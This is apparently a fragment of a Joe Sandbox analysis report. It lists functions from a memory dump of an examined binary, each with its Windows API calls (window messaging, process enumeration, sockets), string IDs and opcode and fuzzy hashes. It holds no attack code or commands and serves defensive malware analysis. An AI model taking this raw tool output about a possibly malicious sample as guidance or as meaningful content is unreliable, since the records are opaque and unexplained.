                                                                                                                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                            • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                            • Opcode ID: 341803d511d7a6f3a5dc5dae0214af42649ceb0c62265f5cb91ea37803b072a3
                                                                                                                                                                                                                                                                            • Instruction ID: 450737127f0eb263dea2fedb701921616e740e6cef72403e556db4cfd5c6a2a3
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 341803d511d7a6f3a5dc5dae0214af42649ceb0c62265f5cb91ea37803b072a3
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7731B339600281DFCB10CF69C585EA97BE0EF54314F24C159E82A8B392D731EF45E760
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00C849DC
                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00C849F0
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00C84A14
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                            • Opcode ID: d8dd13b9291528bfc46bc0d1801db65a2b650ffc14636774a62c4ed61526c44c
                                                                                                                                                                                                                                                                            • Instruction ID: d535c629d95e3c0a61b02403a2accb974761a9c69a8cb52644dbcaefb0dae32b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8dd13b9291528bfc46bc0d1801db65a2b650ffc14636774a62c4ed61526c44c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C721BF32600229BBDF259F50CC42FEF3B69EF48728F110214FA156B0D0DAB1A8559B94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00C851A3
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00C851B1
                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00C851B8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                                                                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                            • Opcode ID: c91c9528a024ba299305e2798d307fbc196450bcd3a973322ff886f213db3293
                                                                                                                                                                                                                                                                            • Instruction ID: 03cac16fc0997515ec2197502cef46bc9aa3983d6a218284789452be55f7ea3f
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c91c9528a024ba299305e2798d307fbc196450bcd3a973322ff886f213db3293
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B72192B5600609BFDB10DF14CC85EBB37ADEB59368B000159F911973A1CB70EC15DB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00C842DC
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00C842EC
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00C84312
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                            • Opcode ID: 72ad5734e36f6eef3376efdc406817cf32d9271619bc22c7a514879967bea7fe
                                                                                                                                                                                                                                                                            • Instruction ID: db00ab03ba23d8671a26a0c841e51009f88c2f80bd46c6453ec0e7d3d88a0998
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 72ad5734e36f6eef3376efdc406817cf32d9271619bc22c7a514879967bea7fe
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B821C232604219BBEF159F94CC84FBF3B6EEF89768F118114F9119B190CA719C5287A4
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C6544D
                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C654A1
                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,00C8DCD0), ref: 00C65515
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                            • String ID: %lu
                                                                                                                                                                                                                                                                            • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                            • Opcode ID: 2caa744a96a2caa613f4fa9482a37239106b53a68b21b72a8df3ab4927dad408
                                                                                                                                                                                                                                                                            • Instruction ID: bb8ee8ce1a232bdb68b49580a458b43d3f034b9b4742b2f481e4e3b4c6f64f95
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2caa744a96a2caa613f4fa9482a37239106b53a68b21b72a8df3ab4927dad408
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B1314F75A00209AFDB10DF54C885EAE77F8EF05318F1440A9E909DB2A2DB71EE45DB61
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00C84CED
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00C84D02
                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00C84D0F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                            • Opcode ID: a5f6ed5670b35541289c9172ec38a0d22be301b2dd2446aad5134cfc2a57d752
                                                                                                                                                                                                                                                                            • Instruction ID: d1ee5fd0a0ca74d641b6b9cb3ee1ef1e9cb6c9632736f00ffecdbe3b154cbb05
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5f6ed5670b35541289c9172ec38a0d22be301b2dd2446aad5134cfc2a57d752
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 38110671240249BFEF206F65CC06FAB3BACEF85B69F110519FA51E60A0C671DC51DB24
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C536F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C53712
                                                                                                                                                                                                                                                                              • Part of subcall function 00C536F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C53723
                                                                                                                                                                                                                                                                              • Part of subcall function 00C536F4: GetCurrentThreadId.KERNEL32 ref: 00C5372A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C536F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C53731
                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00C538C4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5373B: GetParent.USER32(00000000), ref: 00C53746
                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C5390F
                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,00C53987), ref: 00C53937
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                                                                                                                                                                                                                                            • String ID: %s%d
                                                                                                                                                                                                                                                                            • API String ID: 1272988791-1110647743
                                                                                                                                                                                                                                                                            • Opcode ID: c804c5fad29ea864500582b61c2e2e94b023b2cbc57ab3358752f94369d29918
                                                                                                                                                                                                                                                                            • Instruction ID: 7a3035f50636666c78ed193dd5b14630aa78a12fb5987a401d82d19e984b80e5
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c804c5fad29ea864500582b61c2e2e94b023b2cbc57ab3358752f94369d29918
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 121105B56002496BCF01BF709C85BED77A9AF94344F004079BD099B292DE704A89DB24
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C86360
                                                                                                                                                                                                                                                                            • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00C8638D
                                                                                                                                                                                                                                                                            • DrawMenuBar.USER32(?), ref: 00C8639C
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                            • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                                                            • Opcode ID: a870cfdc0696d698cba4a7442a21117a5e08dcd9a1e8c27014ed2ea7ecf6b659
                                                                                                                                                                                                                                                                            • Instruction ID: e2a40cedc3222e55666e06ac5787ca4bd7da82f7c2a52df4a0ab1ca2a81e09fc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a870cfdc0696d698cba4a7442a21117a5e08dcd9a1e8c27014ed2ea7ecf6b659
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1201AD71500208AFDB10AF11DC84BEE7BB5FB45356F2080AAF90AD6160CF708A80EF20
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: 9423f2570821099106563df206fa942897a9d51e7e85b1b84b05a7f3248e971f
                                                                                                                                                                                                                                                                            • Instruction ID: 17e2f6cb92bb4f14f08f08d486f03173cf68ca8e4f5f174cefa2e15eb359fa40
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9423f2570821099106563df206fa942897a9d51e7e85b1b84b05a7f3248e971f
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CC18B79A00206EFCB14CF94C894EAEB7B5FF48705F208598E816EB251D730EE85DB94
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1036877536-0
                                                                                                                                                                                                                                                                            • Opcode ID: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                            • Instruction ID: 671a9cdabac206ed96381b1d018025bf732e37263a240d254fdd2886d5c7fad2
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 65ac5c1fffd7beff7dffafb7e38bd52ffe3f80321006b0a9665303c455145bc9
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0CA1AC72D003A6DFDB2ADF18E8917AEBBE4EF11310F1441ADE5A59BA91C3389E41C750
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00C90BD4,?), ref: 00C50EE0
                                                                                                                                                                                                                                                                            • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00C90BD4,?), ref: 00C50EF8
                                                                                                                                                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,00000000,00C8DCE0,000000FF,?,00000000,00000800,00000000,?,00C90BD4,?), ref: 00C50F1D
                                                                                                                                                                                                                                                                            • _memcmp.LIBVCRUNTIME ref: 00C50F3E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FromProg$FreeTask_memcmp
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 314563124-0
                                                                                                                                                                                                                                                                            • Opcode ID: 88818deda5d25905fd467b14c7d14c006889c1befc29976840043458deb075f1
                                                                                                                                                                                                                                                                            • Instruction ID: dfda971d62b90ca828d48b729e0f0398e510aa783d5c1f7790e8e65bf8612f3e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88818deda5d25905fd467b14c7d14c006889c1befc29976840043458deb075f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 10811C75900109EFCB04DF94C984EEEB7B9FF89315F204558E916EB250DB71AE4ACB60
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32 ref: 00C7B10C
                                                                                                                                                                                                                                                                            • Process32FirstW.KERNEL32(00000000,?), ref: 00C7B11A
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • Process32NextW.KERNEL32(00000000,?), ref: 00C7B1FC
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C7B20B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C0E36B: CompareStringW.KERNEL32(00000409,00000001,?,00000000,00000000,?,?,00000000,?,00C34D73,?), ref: 00C0E395
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1991900642-0
                                                                                                                                                                                                                                                                            • Opcode ID: 006fa8e24c44358961c8fbf029b33b1f6d14ee2db156919c24afc8fd4e2e8650
                                                                                                                                                                                                                                                                            • Instruction ID: 491d450765a66b550f6ad9ad82a11590741b4eae8ffb8694e40231174eb84fba
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 006fa8e24c44358961c8fbf029b33b1f6d14ee2db156919c24afc8fd4e2e8650
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 08514A71508304AFD710EF24C886A6FBBE8FF89754F40895DF59997291DB70D908CB92
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: _free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 269201875-0
                                                                                                                                                                                                                                                                            • Opcode ID: e20c77f8b5d2f6de9f357c79e8d10263eb5378a2f5b2d5252bd7029d87cec9ff
                                                                                                                                                                                                                                                                            • Instruction ID: 295b5e296e6920243dc8b4945b72218a89dfc025d9855b6ea7ba8285ea2625a0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e20c77f8b5d2f6de9f357c79e8d10263eb5378a2f5b2d5252bd7029d87cec9ff
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 80413931A20110AFDB207FBE9C46ABE3AA4EF43730F1D4625FC29D61D1DA35494277A6
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • socket.WSOCK32(00000002,00000002,00000011), ref: 00C7255A
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C72568
                                                                                                                                                                                                                                                                            • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00C725E7
                                                                                                                                                                                                                                                                            • WSAGetLastError.WSOCK32 ref: 00C725F1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$socket
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1881357543-0
                                                                                                                                                                                                                                                                            • Opcode ID: 5f1e46db7a35c7e070ca608569d5fe6f6ad7ba347d8702a01c779fd4f37776de
                                                                                                                                                                                                                                                                            • Instruction ID: 2e8025e55172a5194d77a1f6c1d45138184dfecbc4ec89ec4468093ca5a1bddc
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5f1e46db7a35c7e070ca608569d5fe6f6ad7ba347d8702a01c779fd4f37776de
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1741B274A00204AFE720AF24C886F3A77E5AB44758F54C488FA5A8F2D3D772ED41CB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 00C86D1A
                                                                                                                                                                                                                                                                            • ScreenToClient.USER32(?,?), ref: 00C86D4D
                                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00C86DBA
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Window$ClientMoveRectScreen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3880355969-0
                                                                                                                                                                                                                                                                            • Opcode ID: 59ee2a7b79c283b50520ea2bab3c5f18c6683afd750d0fa0426c3eb60b39f78e
                                                                                                                                                                                                                                                                            • Instruction ID: a161ec437a425bd59e7ab5a5a658880bc48c037d25e378d150a5144b50a1e8b6
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 59ee2a7b79c283b50520ea2bab3c5f18c6683afd750d0fa0426c3eb60b39f78e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CF510C74A00209EFCF24EF64D980AAE7BB6FF44364F10855AF9659B290D770EE81CB54
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
• Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
